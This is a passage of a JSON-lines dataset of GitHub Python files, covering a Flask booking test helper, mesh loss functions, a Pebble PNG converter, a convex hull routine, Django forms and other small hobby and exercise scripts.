is_admin: bool=True) -> dict:\n        \"\"\" Get all bookings (admin) \"\"\"\n\n        resp = client.get(\"/book/admin/get_all\")\n        assert resp.status_code == 200 if is_login and is_admin else resp.status_code == 401\n        return resp.json\n\n\n    def book_inform_sign_before_start(self, start_time:datetime=datetime(2023, 4, 15, 7)):\n        \"\"\" Email users whose bookings at the given time are not checked in, reminding them to check in \"\"\"\n        minute_45(start_time)\n\n\n    def book_start(self, start_time:datetime=datetime(2023, 4, 15, 7)):\n        \"\"\" Update checked-in bookings at the given time to in-progress \"\"\"\n        minute_00(start_time)\n\n\n    def book_inform_sign_after_start(self, start_time:datetime=datetime(2023, 4, 15, 7)):\n        \"\"\" Email users whose bookings at the given time are not checked in, warning of a violation \"\"\"\n        minute_10(start_time)\n\n\n    def book_inform_mark_after_start(self, start_time:datetime=datetime(2023, 4, 15, 7)):\n        \"\"\" Email users whose bookings at the given time are not checked in, notifying them of the violation \"\"\"\n        minute_15(start_time)\n\n\nbook_api = Book_api()","repo_name":"Kusunoki0130/Ibooking_Flask","sub_path":"test/book_api_access.py","file_name":"book_api_access.py","file_ext":"py","file_size_in_byte":3302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"71417505066","text":"n=0\nfact=1\nwhile (n<6):\n    n=int(input(\"Enter n in order to bound S(n) (above or equal to 6) \\n\"))\n\nleft = (3**n-1)//2\nfor i in range (1,n+1):\n    fact = fact*i\n\nright = 3*fact-1\nprint(\"The interval is:\\n\")\nprint(left,\"<= S(\",n,\") <=\",right)\n","repo_name":"popolito1/Project-1-Schur-s-Number","sub_path":"Exercices/4.1.py","file_name":"4.1.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"729265263","text":"import calendar\nfrom PIL import Image, ImageDraw, ImageFont\n\ndef print_on_image(path):\n    allManth=[]\n    num = 0\n    for i in range(12):\n        j=i%len(path)\n        my_photo=path[j]\n        #image = Image.open(path)\n        new_image = Image.new('RGB', (500, 800), (0, 0, 0))\n        draw = ImageDraw.Draw(new_image)\n        font = ImageFont.truetype(r\"Roboto-Black.ttf\", 50)\n        (x, y) = (0, 0)\n        color = 'rgb(255, 255, 255)' # white color\n        im = Image.open(my_photo)\n        im = im.resize((500, 400))\n        new_image.paste(im, (0, 0))\n        c = calendar.TextCalendar()\n        draw.text((0, 0+400), c.formatmonth(2018, i+1, 0, 0), fill=color, font=font)\n        # new_image.save(f'greeting_card_{num}.png')\n        num += 1\n        allManth.append(new_image)\n\n    print(allManth)\n    return allManth\n\n\n","repo_name":"saramontif/PhotoBot","sub_path":"calender.py","file_name":"calender.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"23647527202","text":"import os\nfrom sklearn.datasets import load_iris\nfrom alipy.experiment import State, StateIO\nfrom alipy.toolbox import ToolBox\n\nX, y = load_iris(return_X_y=True)\nsplit_count = 5\ncur_path = os.path.abspath('.')\ntoolbox = ToolBox(X=X, y=y, query_type='AllLabels', saving_path=cur_path)\n\n# split data\ntoolbox.split_AL(test_ratio=0.3, initial_label_rate=0.1, split_count=split_count)\ntrain_ind, test_ind, L_ind, U_ind = toolbox.get_split(round=0)\n# -------Initialize StateIO----------\nsaver = StateIO(round=0, train_idx=train_ind, test_idx=test_ind, init_L=L_ind, init_U=U_ind, saving_path='.')\n# or by using toolbox\n# saver = toolbox.get_stateio(round=0)\n\nsaver.init_L.difference_update([0, 1, 2])\nsaver.init_U.update([0, 1, 2])\n\n# -------Basic operations------------\nst1_batch1 = State(select_index=[1], performance=0.89)\nmy_value = 'my_entry_info'\nst1_batch1.add_element(key='my_entry', value=my_value)\nst1_batch2 = State(select_index=[0, 1], performance=0.89)\nst2_batch1 = State(select_index=[0], performance=0.89)\nst3_batch1 = State(select_index=[2], performance=0.89)\n\nsaver.add_state(st1_batch1)\nsaver.add_state(st1_batch2)\nsaver.add_state(st2_batch1)\n\nsaver.save()\n\nprev_st = saver.get_state(index=1) # get 2nd query\n# or use the index operation directly\nprev_st = saver[1]\n\nvalue = prev_st.get_value(key='select_index')\n# or use the index operation directly\nvalue = prev_st['select_index']\n\n# ---------Recover workspace---------\ntrain, test, L, U = saver.get_workspace(iteration=1)\n# or recover the saver
itself\nsaver.recover_workspace(iteration=1)\n\nsaver = StateIO.load(path='./AL_round_0.pkl')\ntrain, test, L, U = saver.get_workspace() # will return the latest workspace\n","repo_name":"NUAA-AL/ALiPy","sub_path":"examples/tools/StateIO_usage.py","file_name":"StateIO_usage.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","stars":836,"dataset":"github-code","pt":"37"}
{"seq_id":"13802724378","text":"import torch\nimport numpy as np\n\ndef smoothness_loss_parameters(faces):\n    faces = faces.detach().cpu().numpy()\n    vertices = np.concatenate((faces[:, 0:2], faces[:, 1:3]), axis=0)\n    vertices = list(set([tuple(v) for v in np.sort(vertices)]))\n\n    v0s = np.array([v[0] for v in vertices], dtype=np.int32)\n    v1s = np.array([v[1] for v in vertices], dtype=np.int32)\n    v2s = []\n    v3s = []\n    for v0, v1 in zip(v0s, v1s):\n        count = 0\n        for face in faces:\n            if v0 in face and v1 in face:\n                v = np.copy(face)\n                v = v[v!=v0]\n                v = v[v!=v1]\n                if count == 0:\n                    v2s.append(int(v[0]))\n                    count += 1\n                else:\n                    v3s.append(int(v[0]))\n    v2s = np.array(v2s, np.int32)\n    v3s = np.array(v3s, np.int32)\n    return v0s, v1s, v2s, v3s\n\ndef iou(data1, data2):\n    batch_size = data1.shape[0]\n    axes = tuple(range(data1.dim())[1:])\n    intersection = torch.sum(data1*data2, dim=axes)\n    union = torch.sum(data1 + data2 - data1 * data2, dim=axes)\n    return torch.sum(intersection/union) / batch_size\n\ndef iou_loss(data1, data2):\n    return 1 - iou(data1, data2)\n\n\ndef smoothness_loss(vertices, parameters, eps=1e-6):\n    # make v0s, v1s, v2s, v3s\n    v0s, v1s, v2s, v3s = parameters\n    batch_size = vertices.shape[0]\n\n    # compute angle of two adjacent triangles\n    # notations are illustrated in https://github.com/hiroharu-kato/mesh_reconstruction/blob/master/data/misc/smooth_loss.png\n    # This code computes the angle using vectors c1->b1 and c2->b2\n\n    # get a1 and b1\n    # * triangle A: [v0, v1, v2]\n    # * triangle B: [v0, v1, v3]\n    # v0s.shape == [batch size, num of triangle pairs, 3(xyz)].\n    v0s = vertices[:, v0s, :]\n    v1s = vertices[:, v1s, :]\n    v2s = vertices[:, v2s, :]\n    v3s = vertices[:, v3s, :]\n    a1 = v1s - v0s\n    b1 = v2s - v0s\n\n    # compute dot and cos of a1 and b1\n    a1l2 = torch.sum(a1**2, dim=-1)\n    b1l2 = torch.sum(b1**2, dim=-1)\n    a1l1 = torch.sqrt(a1l2 + eps)\n    b1l1 = torch.sqrt(b1l2 + eps)\n    ab1 = torch.sum(a1 * b1, dim=-1)\n    cos1 = ab1 / (a1l1 * b1l1 + eps)\n    sin1 = torch.sqrt(1 - cos1**2 + eps)\n\n    # c1 = (a1/|a1|) * (|b1|*cos) = a1 * dot(a1, b1) / |a1|^2\n    c1 = a1 * (ab1 / (a1l2 + eps))[:, :, None].expand_as(a1)\n\n    # vector of c1->b1, and its length\n    cb1 = b1 - c1\n    cb1l1 = b1l1 * sin1\n\n    # same computation for triangle B\n    a2 = v1s - v0s\n    b2 = v3s - v0s\n    a2l2 = torch.sum(a2**2, dim=-1)\n    b2l2 = torch.sum(b2**2, dim=-1)\n    a2l1 = torch.sqrt(a2l2 + eps)\n    b2l1 = torch.sqrt(b2l2 + eps)\n    ab2 = torch.sum(a2 * b2, dim=-1)\n    cos2 = ab2 / (a2l1 * b2l1 + eps)\n    sin2 = torch.sqrt(1 - cos2**2 + eps)\n    c2 = a2 * (ab2 / (a2l2 + eps))[:, :, None].expand_as(a2)\n    cb2 = b2 - c2\n    cb2l1 = b2l1 * sin2\n\n    # cos of c1b1 and c2b2\n    cos = torch.sum(cb1 * cb2, dim=-1) / (cb1l1 * cb2l1 + eps)\n\n    loss = torch.sum((cos + 1)**2) / batch_size\n    return loss","repo_name":"jingma-git/neural_rendering","sub_path":"neural_mesh_renderer/loss_functions.py","file_name":"loss_functions.py","file_ext":"py","file_size_in_byte":2998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"1631501960","text":"from config import get_tweepy_api\nfrom researcher 
import TwitterResearcher\nfrom publisher import TwitterPublisher\nfrom filters import TwitterFilter\n\nTERM_LIST = [\"dogecoin\", \"doge\", \"dogearmy\", \"dogeday\"]\n\ndef bot_routine(searcher, publisher):\n    \"\"\"\n    Perform the bot routine: research and post lists of tweets.\n\n    Prepare multiple lists to be posted at once in a single thread.\n    \"\"\"\n    #Search tweets from certified accounts\n    certified_tweets = searcher.search(TERM_LIST,\n            certified=True, tweet_filter=TwitterFilter())\n    publisher.store_tweet_list(\"Certified Account ✅\", certified_tweets)\n\n    #Search tweets with some social activity, with\n    #minimal likes, retweets or replies.\n    low_limit = 150\n    active_tweets = searcher.search(TERM_LIST, certified=False,\n            tweet_filter=TwitterFilter(), min_faves=low_limit,\n            min_retweets=low_limit, min_replies=low_limit)\n    publisher.store_tweet_list(\"Active tweet 🚀\", active_tweets)\n\n    #Publish each stored list on Twitter as a single thread.\n    publisher.post_thread()\n\nif __name__ == \"__main__\":\n    api = get_tweepy_api()\n    bot_routine(TwitterResearcher(api), TwitterPublisher(api))\n","repo_name":"branchmaster/DogeCoin-Twitter-Bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"4367947657","text":"# leetcode submit region begin(Prohibit modification and deletion)\nfrom heapq import heappush, heappop\n\n\nclass StockPrice:\n    def __init__(self):\n        self.timePriceMap = {}\n        self.pqMax = []\n        self.pqMin = []\n        self.maxTimeStamp = 0\n\n    def update(self, timestamp: int, price: int) -> None:\n        self.maxTimeStamp = max(self.maxTimeStamp, timestamp)\n        heappush(self.pqMax, (-price, timestamp))\n        heappush(self.pqMin, (price, timestamp))\n        self.timePriceMap[timestamp] = price\n\n    def current(self) -> int:\n        return self.timePriceMap[self.maxTimeStamp]\n\n    def maximum(self) -> int:\n        while True:\n            price, timestamp = self.pqMax[0]  # peek the heap root, not the last element\n            if self.timePriceMap[timestamp] == -price:\n                return -price\n            heappop(self.pqMax)\n\n    def minimum(self) -> int:\n        while True:\n            price, timestamp = self.pqMin[0]  # peek the heap root, not the last element\n            if self.timePriceMap[timestamp] == price:\n                return price\n            heappop(self.pqMin)\n\n\n\n# Your StockPrice object will be instantiated and called as such:\n# obj = StockPrice()\n# obj.update(timestamp,price)\n# param_2 = obj.current()\n# param_3 = obj.maximum()\n# param_4 = obj.minimum()\n# leetcode submit region end(Prohibit modification and deletion)\n","repo_name":"Howloong/Leetcode","sub_path":"python/leetcode/editor/cn/P2034_StockPriceFluctuation.py","file_name":"P2034_StockPriceFluctuation.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"22845552115","text":"from django.contrib import admin\nfrom django.urls import path,include\nfrom . 
import views\n\nurlpatterns = [\n    path('', views.homepage, name='homepage.html'),\n    path('homepage', views.homepage, name='homepage.html'),\n    path('homepage/addblog', views.addblog, name='addblog'),\n    path('homepage/seeblogs', views.seeblogs, name='seeblogs'),\n    path('homepage/seebyid', views.seebyid, name='seebyid'),\n    path('homepage/deletebyid', views.deletebyid, name='deletebyid'),\n    path('homepage/update', views.update, name='update'),\n    path('homepage/seecomment', views.seecomment, name='seecomment'),\n    path('homepage/addcomment', views.addcomment, name='addcomment'),\n]\n\n","repo_name":"Akshayjain60165/Blog-operations","sub_path":"contents/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"24769467016","text":"# import random\n# arr = []\n# try :\n# n = int(input(\"Enter the size of array: \"))\n# for i in range(0,n):\n# arr.append(random.randint(1, 100))\n# print(arr)\n# except (ValueError,NameError,RecursionError) as f:\n# print(\"ERROR!!Please put integer as size!!\")\n\n# # def second_max(array,left,right):\n# # if left==right:\n# # maximum1 = array[left]\n# # return maximum1,-1\n# # elif right-left ==1:\n# # maximum1 = max(arr[left],arr[right])\n# # maximum2 = min(arr[left],arr[right])\n# # return maximum1,maximum2\n# # else:\n# # mid = (left+right)//2\n# # maxi,maxii = second_max(array, left, mid)\n# # max3,max4 = second_max(array, mid+1, right)\n# # if maxi< max3:\n# # temp1 = max3\n# # if maxisecmax2:\n# # return secmax1\n# # else:\n# # return secmax2\nimport random as rd\ndef find_second_max(arr, start, end):\n    if start == end:\n        return arr[start], float('-inf')\n    if start + 1 == end:\n        return (arr[start], arr[end]) if arr[start] > arr[end] else (arr[end], arr[start])\n    mid = (start + end) // 2\n    left_max, left_second_max = find_second_max(arr, start, mid)\n    right_max, right_second_max = find_second_max(arr, mid + 1, end)\n    second_max = max(left_second_max, right_second_max, min(left_max, right_max))\n    if left_max > right_max:\n        return left_max, second_max\n    else:\n        return right_max, second_max\n\nif __name__ == \"__main__\": \n    try:\n        n = int(input(\"Enter the size of the array: \"))\n        if n >0:\n            arr = [rd.randint(1, 100) for _ in range(n)]  # Generate a random array\n            print(\"Array:\", arr)\n            _, second_largest = find_second_max(arr, 0, n-1)\n            print(\"Second Largest:\", second_largest)\n        else:\n            print(\"Please enter a positive number as the size\")\n    except ValueError:\n        print(\"ERROR!! 
Please input an integer as the size.\")\n\n","repo_name":"ypradhan222/mtech_code","sub_path":"ALgorithms/dc_second_large.py","file_name":"dc_second_large.py","file_ext":"py","file_size_in_byte":2909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1594544050","text":"import png\nimport itertools\nfrom io import BytesIO\n\nimport pebble_image_routines\n\n# color reduction methods\nTRUNCATE = \"truncate\"\nNEAREST = \"nearest\"\nCOLOR_REDUCTION_CHOICES = [TRUNCATE, NEAREST]\nSUPPORTED_PALETTES = ('pebble2', 'pebble64')\nDEFAULT_COLOR_REDUCTION = NEAREST\n\n# Public APIs\ndef convert_png_to_pebble_png(input_filename, output_filename,\n palette_name, color_reduction_method=DEFAULT_COLOR_REDUCTION,\n bitdepth=None):\n \"\"\"\n Convert a png to a pblpng and write it to output_filename\n \"\"\"\n\n output_png_writer, image_data = _convert_png_to_pebble_png_writer(\n input_filename, palette_name, color_reduction_method, force_bitdepth=bitdepth)\n\n with open(output_filename, 'wb') as output_file:\n output_png_writer.write_array(output_file, image_data)\n\n\ndef convert_png_to_pebble_png_bytes(input_filename, palette_name,\n color_reduction_method=DEFAULT_COLOR_REDUCTION,\n bitdepth=None):\n \"\"\"\n Convert a png to a pblpng and return a string with the raw data\n \"\"\"\n\n output_png, image_data = _convert_png_to_pebble_png_writer(\n input_filename, palette_name, color_reduction_method, force_bitdepth=bitdepth)\n\n output_str = BytesIO()\n output_png.write_array(output_str, image_data)\n\n return output_str.getvalue()\n\n\n# Implementation\ndef _convert_png_to_pebble_png_writer(input_filename, palette_name, color_reduction_method,\n force_bitdepth=None):\n input_png = png.Reader(filename=input_filename)\n\n # sbit breaks pypngs convert_rgb_to_rgba routine\n # and is unnecessary, as it is only an optional optimization\n # so disable it by loading the PNG pre-data and disabling sbit\n input_png.preamble()\n input_png.sbit = None\n\n # open as RGBA 32-bit (allows for simpler parsing cases)\n width, height, pixels, metadata = input_png.asRGBA8()\n\n # convert RGBA 32-bit boxed rows to list for output\n rgba32_list = grouper(itertools.chain.from_iterable(pixels), 4)\n\n color_reduction_func = pebble_image_routines.get_reduction_func(palette_name,\n color_reduction_method)\n is_grey, has_alpha, bitdepth, palette = get_palette_for_png(input_filename,\n palette_name,\n color_reduction_method)\n\n if force_bitdepth is not None:\n if bitdepth > force_bitdepth:\n raise Exception(\"Tried to force {} bits; need at least {}.\"\n .format(force_bitdepth, bitdepth))\n\n # If we're forcing a particular bitdepth, and it's not the one we were going\n # to use, skip the greyscale dance.\n if bitdepth != force_bitdepth:\n is_grey = False\n bitdepth = force_bitdepth\n\n transparent_grey = None\n # determine the grey value for tRNs transparency\n if is_grey and has_alpha:\n if bitdepth == 4:\n # 4 available shades of grey are occupied\n transparent_grey = 0xC # bitdepth 4 supported value\n else:\n greyscale_list = [0, 255, 85, 170] # in order of bitdepth required\n for lum in greyscale_list:\n # find the first unused greyscale value in terms of available bitdepth\n if (lum, lum, lum, 255) not in palette:\n # transparent grey value for requested greyscale bitdepth\n transparent_grey = lum >> (8 - bitdepth)\n break\n\n # second pass of pixel data, converts rgba32 pixels to greyscale or palettized output\n image = []\n for (r, g, b, a) in rgba32_list:\n # 
operating on original pixel values, need to do the same color reduction\n # as when the palette was generated\n (r, g, b, a) = color_reduction_func(r, g, b, a)\n\n if is_grey:\n # convert red channel (as luminosity value) to a greyscale at bitdepth\n # if transparent, output the transparent_grey value for that bitdepth\n if a == 0:\n image.append(transparent_grey)\n else:\n image.append(r >> (8 - bitdepth))\n elif has_alpha:\n # append the palette index for output\n image.append(palette.index((r, g, b, a)))\n else:\n # append the palette index for output\n image.append(palette.index((r, g, b)))\n\n if is_grey:\n # remove the palette for greyscale output with writer\n palette = None\n\n output_png = png.Writer(width=width, height=height, compression=9, bitdepth=bitdepth,\n palette=palette, greyscale=is_grey, transparent=transparent_grey)\n\n return (output_png, image)\n\n\ndef get_palette_for_png(input_filename, palette_name, color_reduction_method):\n input_png = png.Reader(filename=input_filename)\n\n # sbit breaks pypngs convert_rgb_to_rgba routine\n # and is unnecessary, as it is only an optional optimization\n # so disable it by loading the PNG pre-data and disabling sbit\n input_png.preamble()\n input_png.sbit = None\n\n # open as RGBA 32-bit (allows for simpler parsing cases)\n width, height, pixels, metadata = input_png.asRGBA8()\n\n palette = [] # rgba32 image palette\n is_grey = True # does the image only contain greyscale pixels (and only full or opaque)\n has_alpha = False # does the image contain alpha\n\n # iterators are one shot, so make a copy of just the iterator and not the data\n # to be able to parse the data twice (we do not modify the pixel data itself)\n # once to generate the palette\n # once to output the final pixel data as greyscale or palette indexes\n pixels, pixels2 = itertools.tee(pixels)\n\n # Figure out what color reduction algorithm we should be using.\n color_reduction_func = pebble_image_routines.get_reduction_func(palette_name,\n color_reduction_method)\n\n # convert RGBA 32-bit image colors to pebble color table\n for (r, g, b, a) in grouper(itertools.chain.from_iterable(pixels2), 4):\n (r, g, b, a) = color_reduction_func(r, g, b, a)\n\n if (r, g, b, a) not in palette:\n palette.append((r, g, b, a))\n # Check if image contains any transparent pixels\n if (a != 0xFF):\n has_alpha = True\n # greyscale only if rgb is gray and opaque or fully transparent\n if is_grey and not (((r == g == b) and a == 255) or (r, g, b, a) == (0, 0, 0, 0)):\n is_grey = False\n\n # Calculate required bit depth\n\n # get the bitdepth for the number of colors\n bitdepth = pebble_image_routines.num_colors_to_bitdepth(len(palette))\n if is_grey:\n # for Greyscale, it is the required colors that set the bitdepth\n # so if image contains LightGray or DarkGray it requires bitdepth 2\n if (85, 85, 85, 255) in palette or (170, 170, 170, 255) in palette:\n # if palette contains all 4 greyscale and transparent, bump up bitdepth\n if (len(palette)) >= 5:\n grey_bitdepth = 4\n else:\n grey_bitdepth = 2\n else:\n # if palette contains black, white and transparent, bump up bitdepth\n if (len(palette)) >= 3:\n grey_bitdepth = 2\n else:\n grey_bitdepth = 1\n if grey_bitdepth > bitdepth:\n is_grey = False\n else:\n bitdepth = grey_bitdepth\n\n # update data for RGB output format\n if not has_alpha:\n # recreate the palette without an alpha channel to support RGB PNG\n palette = [(p_r, p_g, p_b) for p_r, p_g, p_b, p_a in palette]\n\n return is_grey, has_alpha, bitdepth, palette\n\n\ndef 
grouper(iterable, n, fillvalue=None):\n    from itertools import zip_longest\n\n    args = [iter(iterable)] * n\n    return zip_longest(fillvalue=fillvalue, *args)\n\n\ndef get_ideal_palette(is_color=False):\n    if is_color:\n        return 'pebble64'\n    else:\n        return 'pebble2'\n\n\ndef main():\n    import argparse\n\n    parser = argparse.ArgumentParser(\n        description='Convert PNG to 64-color palettized or grayscale PNG')\n    parser.add_argument('input_filename', type=str, help='png file to convert')\n    parser.add_argument('output_filename', type=str, help='converted file output')\n    parser.add_argument('--palette', type=str, required=False,\n                        choices=SUPPORTED_PALETTES, default='pebble64',\n                        help=\"Specify the standard palette of the resulting png. Colors will be \"\n                             \"converted to this lower bit depth using the color_reduction_method \"\n                             \"arg.\")\n    parser.add_argument('--color_reduction_method', metavar='method', required=False,\n                        nargs=1, default=NEAREST, choices=COLOR_REDUCTION_CHOICES,\n                        help=\"Method used to convert colors to Pebble's color palette, \"\n                             \"options are [{}, {}]\".format(NEAREST, TRUNCATE))\n    args = parser.parse_args()\n\n    convert_png_to_pebble_png(args.input_filename, args.output_filename,\n                              args.palette, args.color_reduction_method)\n\nif __name__ == '__main__':\n    main()\n","repo_name":"pebble-dev/RebbleOS","sub_path":"Utilities/pebblepng.py","file_name":"pebblepng.py","file_ext":"py","file_size_in_byte":9431,"program_lang":"python","lang":"en","doc_type":"code","stars":336,"dataset":"github-code","pt":"37"}
{"seq_id":"33763113649","text":"import numpy as np\nimport cv2\nfrom scipy.ndimage.filters import gaussian_filter\n\ncap = cv2.VideoCapture('/home/alien/Documents/opencv/videos/pipeinsp.avi')\n\nwhile(True):\n    # Capture frame-by-frame\n    ret, frame = cap.read()\n\n    # Our operations on the frame come here\n    img = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n    '''\n    # remove noise\n    img = cv2.GaussianBlur(gray,(3,3),10)\n\n    # convolute with proper kernels\n    laplacian = cv2.Laplacian(img,cv2.CV_64F)\n    sobelx = np.absolute(cv2.Sobel(img,cv2.CV_64F,1,0,ksize=5)) # x\n    sobely = cv2.Sobel(img,cv2.CV_64F,0,1,ksize=5) # y\n    '''\n\n    img = cv2.Canny(img,140,200)\n    # Display the resulting frame\n    cv2.imshow('frame',img)\n    if cv2.waitKey(1) & 0xFF == ord('q'):\n        break\n\n# When everything is done, release the capture\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"RobinsonGarcia/cs231n-Spring2017","sub_path":"opencv/opencv_tut.py","file_name":"opencv_tut.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"6054408027","text":"\n#coding=UTF-8\n\n\nfrom element import *\nfrom Divider import *\n\nclass Convexhull:\n    def __init__(self,points,upper=None,lower=None):\n        self.points = points\n        self.upper = upper\n        self.lower = lower\n    \n    @staticmethod\n    def Do_convexhull(points):\n        # with three or fewer points, just connect them: two points = a line, three points = a triangle\n        if len(points) <= 3:\n            Point.sort_counterclockwisely(points)\n            #print(points)\n            return Convexhull(points)\n        elif(len(points)>3 and Point.if_collinear(points)) :\n            Point.sort_counterclockwisely(points)\n            return Convexhull(points) \n        points.sort(key=lambda p: [p.y,p.x]) # sort ascending (by y, then x)\n        half = int(len(points)/2)\n        c_l = Convexhull.Do_convexhull(points[:half])\n        c_r = Convexhull.Do_convexhull(points[half:])\n        return Convexhull.divider(c_l,c_r)\n    \n    @staticmethod\n    def divider(c_l,c_r):\n        p_up,q_up,p_low,q_low,points = Convexhull.merge(c_l,c_r)\n        d_up = Divider.Do_divider(p_up,q_up) # perpendicular bisector of the upper tangent\n        d_low = 
Divider.Do_divider(p_low,q_low) # perpendicular bisector of the lower tangent\n        return Convexhull(points,upper=d_up,lower = d_low)\n    @staticmethod\n    def if_leftturn(p1,p2,p3):\n        v1 = Vector.vector_is(p1,p2)\n        v2 = Vector.vector_is(p1,p3)\n        return Vector.crossproduct(v1,v2) < 0\n    \n    @staticmethod\n    def if_rightturn(p1,p2,p3):\n        v1 = Vector.vector_is(p1,p2)\n        v2 = Vector.vector_is(p1,p3)\n        return Vector.crossproduct(v1,v2) > 0\n\n    @staticmethod\n    def merge(c_l,c_r):\n\n        Point.sort_counterclockwisely(c_l.points)\n        Point.sort_counterclockwisely(c_r.points)\n        p = c_l.points.index(max(c_l.points,key = lambda p:p.x))\n        q = c_r.points.index(min(c_r.points,key = lambda p:p.x))\n\n        plen = len(c_l.points)\n        qlen = len(c_r.points)\n        copy_p = p \n        copy_q = q \n\n        #upper\n        prev_p = None\n        prev_q = None\n\n        while(1):\n            prev_p = p \n            prev_q = q \n            while (Convexhull.if_leftturn(c_l.points[p],c_r.points[q],c_r.points[(q-1+qlen)%qlen])): # c_r's points are in counterclockwise order, so the next clockwise point = previous index\n                q = (q-1+qlen)%qlen\n            while (Convexhull.if_rightturn(c_r.points[q],c_l.points[p],c_l.points[(p+1+plen)%plen])) : # c_l's points are in counterclockwise order, so the next counterclockwise point = next index\n                p = (p+1+plen)%plen\n            if p == prev_p and q == prev_q :\n                break\n        \n        #lower\n        prev_p = None\n        prev_q = None\n        while(1):\n            prev_p = copy_p\n            prev_q = copy_q \n            while (Convexhull.if_rightturn(c_l.points[copy_p],c_r.points[copy_q],c_r.points[(copy_q+1+qlen)%qlen])):\n                copy_q = (copy_q+1+qlen)%qlen\n            while (Convexhull.if_leftturn(c_r.points[copy_q],c_l.points[copy_p],c_l.points[(copy_p-1+plen)%plen])):\n                copy_p = (copy_p-1+plen)%plen\n            if copy_p == prev_p and copy_q == prev_q:\n                break\n\n        result = []\n        # [:x] = first x items; [x:] = items from index x onward\n        if(copy_p < p):\n            result += c_l.points[:copy_p+1]+c_l.points[p:]\n        else:\n            result += c_l.points[p:copy_p+1]\n\n        if(q < copy_q):\n            result += c_r.points[:q+1] + c_r.points[copy_q:]\n        else: \n            result += c_r.points[copy_q:q+1]\n\n        Point.sort_counterclockwisely(result)\n        return (c_l.points[p],c_r.points[q],c_l.points[copy_p],c_r.points[copy_q],result)\n    \n\n\n","repo_name":"yupeiii/algo_voronoi","sub_path":"Convexhull.py","file_name":"Convexhull.py","file_ext":"py","file_size_in_byte":3607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"40567915025","text":"from .base_screens import Screens\nfrom .cat_screens import ProfileScreen, ChangeGenderScreen, ChangeNameScreen, ExileProfileScreen, GenderChangedScreen, NameChangedScreen\nfrom .clan_creation_screens import ClanCreatedScreen, MakeClanScreen\nfrom .clan_screens import ClanScreen, StarClanScreen, DFScreen, ListScreen, AllegiancesScreen\nfrom .event_screens import EventsScreen, SingleEventScreen, PatrolEventScreen, RelationshipEventScreen\nfrom .organizational_screens import\\\n    StartScreen, SettingsScreen, InfoScreen, SwitchClanScreen, LanguageScreen, RelationshipSettingsScreen, StatsScreen\nfrom .patrol_screens import PatrolScreen\nfrom .relation_screens import\\\n    RelationshipScreen, ChooseMateScreen, ViewChildrenScreen, ChooseMentorScreen\nfrom .world_screens import MapScreen, OutsideClanScreen\n\n# ---------------------------------------------------------------------------- #\n#                                   UI RULES                                   #\n# ---------------------------------------------------------------------------- #\n\"\"\"\nSCREEN: 700 height x 800 width\n\nMARGINS: 25px on all sides\n ~Any new buttons or text MUST be within these margins.\n ~Buttons on the edge of the screen should butt up right against the margin. \n (i.e. the <
', classifier.classify(extract_features(name, i)))\n","repo_name":"JohnnySunkel/BlueSky","sub_path":"NLP/gender_identifier.py","file_name":"gender_identifier.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"406887598","text":"from django import forms\nfrom django.core.exceptions import ValidationError\nfrom django.contrib.auth.forms import UserCreationForm, UserChangeForm\n\n#from base.views import job_Description\nfrom .models import CustomUser, JobApplicant\n\nclass UserRegistrationForm(UserCreationForm):\n email = forms.EmailField(required = True) \n class Meta:\n model = CustomUser\n fields = ( 'email', 'password1', 'password2')\n def save(self, commit = True):\n user = super(UserRegistrationForm, self).save(commit = False)\n user.email = self.cleaned_data['email']\n if commit:\n user.save()\n return user\nclass UserLoginForm(UserChangeForm):\n \n class Meta:\n model = CustomUser\n fields = (\"email\",)\n\nclass ApplicationForm(forms.ModelForm):\n def __init__(self, **kwargs):\n\n self.base_fields['user'].initial = kwargs.pop('user', None)\n self.base_fields['job_description'].initial = kwargs.pop('job_description', None)\n \n\n super(ApplicationForm, self).__init__(**kwargs)\n print(self.fields)\n \n resume = forms.FileField() \n \n class Meta:\n model = JobApplicant\n \n fields = '__all__'\n exclude = ['status']\n \n def save(self, commit=True, *args, **kwargs):\n u = super(ApplicationForm, self).save(commit=False, *args, **kwargs)\n if commit:\n u.save()\n return u \n\n\n'''class ApplicationForm(forms.ModelForm):\n #job_description = forms.CharField(max_length=30)\n first_name = forms.CharField(max_length = 20)\n last_name = forms.CharField(max_length = 25)\n email = forms.EmailField(max_length = 50)\n contact_number = forms.CharField(max_length = 12)\n resume = forms.FileField()\n notice_period = forms.IntegerField()\n\n class Meta():\n model = JobApplicant\n fields = (\n \n 'first_name',\n 'last_name',\n 'email',\n 'contact_number',\n 'resume',\n 'notice_period',\n ) \n \n def save(self, commit = True):\n user = super(ApplicationForm, self).save(commit = False)\n user.email = self.cleaned_data['email']\n if commit:\n user.save(commit = True)\n return user\n \n def clean_email(self):\n email = self.cleaned_data.get(\"email\")\n\n try:\n CustomUser.objects.get(email=email)\n\n except CustomUser.DoesNotExist:\n return email\n\n raise ValidationError('This email address is already in use.')\n \n 